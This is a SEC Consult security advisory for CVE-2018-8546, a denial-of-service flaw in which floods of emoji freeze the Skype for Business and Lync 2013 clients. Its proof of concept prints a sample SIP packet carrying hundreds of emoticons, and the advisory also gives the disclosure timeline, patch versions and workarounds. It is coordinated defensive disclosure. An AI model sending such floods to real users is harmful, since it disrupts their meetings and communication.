SEC Consult Vulnerability Lab Security Advisory < 20181114-0 >
=======================================================================
              title: Denial of Service
            product: Microsoft Skype for Business 2016 / Lync 2013
 vulnerable version: Microsoft Skype for Business 2015 (Lync 2013) before
                     v15.0.5075.1000
                     Skype for Business 2016: before v16.0.4756.1000
      fixed version: Microsoft Skype for Business 2015 (Lync 2013) v15.0.5075.1000
                     Skype for Business 2016 v16.0.4756.1000
         CVE number: CVE-2018-8546
             impact: Medium
           homepage: https://www.skype.com/en/business/
              found: 08/2018
                 by: Sabine Degen (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Europe | Asia | North America

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"Skype for Business (formerly Microsoft Office Communicator and Microsoft
Lync) is an instant messaging client used with Skype for Business Server or
with Skype for Business Online (available with Microsoft Office 365).
Skype for Business is enterprise software."

Source: https://en.wikipedia.org/wiki/Skype_for_Business


Business recommendation:
------------------------
Assess the impact of this vulnerability on your business. The patch
provided by Microsoft should be installed immediately. Especially if
Skype for Business is being used for external communication.


Vulnerability overview/description:
-----------------------------------
A large number of emojis (e.g. ~800 kittens) received in one message by the Skype
For Business client freezes the program for a few seconds. This can be
exploited to perform Denial of Service attacks against Skype for Business
users and compromises the availability of the program.

For example, an attacker can continuously send such messages to the chat
window of a meeting room in order to freeze the program for all participants
and prevent them from using the chat or seeing the video.

Note that the sound and video stream is handled by a separate thread and
therefore are not affected (e.g. killed), only the functions related to
graphical user interface become unusable.


Proof of concept:
-----------------
After sending a big amount of emojis (~800 kittens) to a Skype for Business
chat, the program freezes for a few seconds while rendering the chat window.
Continuously sending emojis will make the GUI unusable for the user.
Ongoing conference calls are not affected or interrupted.

The following SIP packet illustrates the attack.

MESSAGE sip:xxx@*redacted*;opaque=user:epid:EwWlc9DdAFGQtozR4vBibAAA;gruu SIP/2.0
Via: SIP/2.0/tls 127.0.0.1:7490
From: <sip:lyncdummy@*redacted*>;tag=82254700;epid=e67b0162bec8
To: <sip:xxx@*redacted*>;tag=5c302cb624;epid=15347556e6
Max-Forwards: 70
CSeq: 12 MESSAGE
User-Agent: Purple/2.12.0 Sipe/1.23.2 (win-i386; RTC/5.0)
Call-ID: 440Eg2C92a5C4Ci0A43m5DDAt76CEb3DEAx13B0x
Route:
<sip:*redacted*:5061;transport=tls;opaque=state:T:F:Eu:Ci.R5a4100;lr;ms-route-sig=ey6XhfVINhLjEiZxqAoCWXcGmObktXoI0nG0AvGmdXYEuYRT6e8Utq9wAA>
Contact: <sip:lyncdummy@*redacted*;opaque=user:epid:cfMFfITMsFCxsLbx1gL31gAA;gruu>
Content-Type: text/plain;
charset=UTF-8;msgr=WAAtAE0ATQBTAC0ASQBNAC0ARgBvAHIAbQBhAHQAOgAgAEYATgA9AE0AUwAlADIAMABTAGEAbgBzACUAMgAwAFMAZQByAGkAZgA7ACAARQBGAD0AOwAgAEMATwA9ADAAOwAgAFAARgA9ADAAOwAgAFIATAA9ADAADQAKAA0ACgA
Content-Length: 4420
Authorization: TLS-DSK qop="auth", opaque="174C6224", realm="SIP Communications
Service", targetname="*redacted*", crand="1126134f", cnum="29", response="*redacted*"

(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat) [...]


Vulnerable / tested versions:
-----------------------------
The following versions have been identified as vulnerable which were
the latest versions available at the time of the test:

* Lync 2013 (15.0) 64-Bit part of Microsoft Office Professional Plus 2013
* Skype for Business 2016 MSO (16.0.93).64-Bit,

Both versions were running on Windows 10 Pro.

According to the vendor, all previous versions are affected:
* Skype for Business 2015 (Lync 2013) before v15.0.5075.1000
* Skype for Business 2016: before v16.0.4756.1000


Vendor contact timeline:
------------------------
2018-08-02: Vulnerability details submitted to Microsoft,
            MSRC Case 47060aassigned
2018-08-28: Asking for a status update
2018-08-30: Vendor: issue has been reproduced, solution to block the user
            provided
2018-08-31: Follow-up questions why DoS is not categorized as security issue
            as the provided workaround is not effective for attacks already
            in progress
2018-08-31: Vendor: decided to fix the issue, rollout planned for early October
2018-09-03: Agreed to release advisory after mid October
2018-10-10: Asking for a status update
2018-10-10: Microsoft: Issue has been fixed on October 2nd, CVE number will be
            assigned soon.
2018-10-10: Asking for affected versions, advisory notes
2018-10-10: Microsoft: KB #4461446 and #4092445
2018-10-10: Reviewing KB articles, asking Microsoft why there is no mention of
            the security fix in #4092445
2018-10-11: Microsoft: there was a mistake, the patch needs to be re-released
            as security fix, agreed on postponing until next Patch Tuesday in
            November
2018-10-15: CVE number CVE-2018-8546 provided on Patch Tuesday
2018-11-14: Coordinated release of security advisory


Solution:
---------
Apply the security patches provided by the vendor. The fixed versions are:
* Skype for Business 2015 (Lync 2013) version 15.0.5075.1000
* Skype for Business 2016 (KB4092445) version 16.0.4756.1000

Microsoft provided the following links for further information:
https://support.microsoft.com/en-us/help/4461446/october-2-2018-update-for-skype-for-business-2015-lync-2013-kb4461446
https://support.microsoft.com/en-us/help/4092445/october-2-2018-update-for-skype-for-business-2016-kb4092445


Workaround:
-----------
Disable emoticons in Skype for Business:
Tools -> Options -> IM -> Show emoticons in messages

Or block the user performing the DoS attacks by right-clicking on the contact
and "Change Privacy Relationship", then click "Blocked Contacts"
(of course this will only work when there is no active DoS attack)


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF S. Degen / @2018